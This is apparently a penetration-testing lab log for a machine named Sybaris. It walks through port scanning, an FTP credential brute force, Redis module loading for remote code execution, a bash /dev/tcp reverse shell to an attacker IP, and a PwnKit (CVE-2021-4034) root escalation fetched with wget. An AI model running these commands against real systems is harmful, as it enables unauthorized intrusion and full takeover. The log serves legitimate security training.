Sybaris
๐งช Pentest Log: {{date:2025-08-13}}
๐ Target Information
- Machine Name: Sybaris
- IP Address: 192.168.148.93
- Operating System: Linux
ip=192.168.148.93
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 21
Bruteforce Common Credentials
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -6 ftp://$ip
found credential
ftp:ftp
Port 22
Port 80
Web Directory Scan
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
Port 6379
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 6379
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
make
ftp ftp@$ip
put module.so
redis-cli -h $ip
MODULE load /var/ftp/pub/module.so
system.exec "/bin/bash -i >& /dev/tcp/192.168.45.163/80 0>&1"
python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 80
๐งฌ Privilege Escalation
๐ค Current Access
- User: pablo
- Groups: pablo
- Shell Type: reverse shell
๐ Enumeration
Linpeas:
wget http://192.168.45.163:6379/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
found
CVE-2021-4034
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Kernel Exploit
- Target Binary/Service: N/A
- Reference / Source: N/A
๐ง Exploit Steps
- Smash to root
wget http://192.168.45.163:6379/cve-2021-4034.c
wget http://192.168.45.163:6379/Makefile
wget http://192.168.45.163:6379/pwnkit.c
make
./cve-2021-4034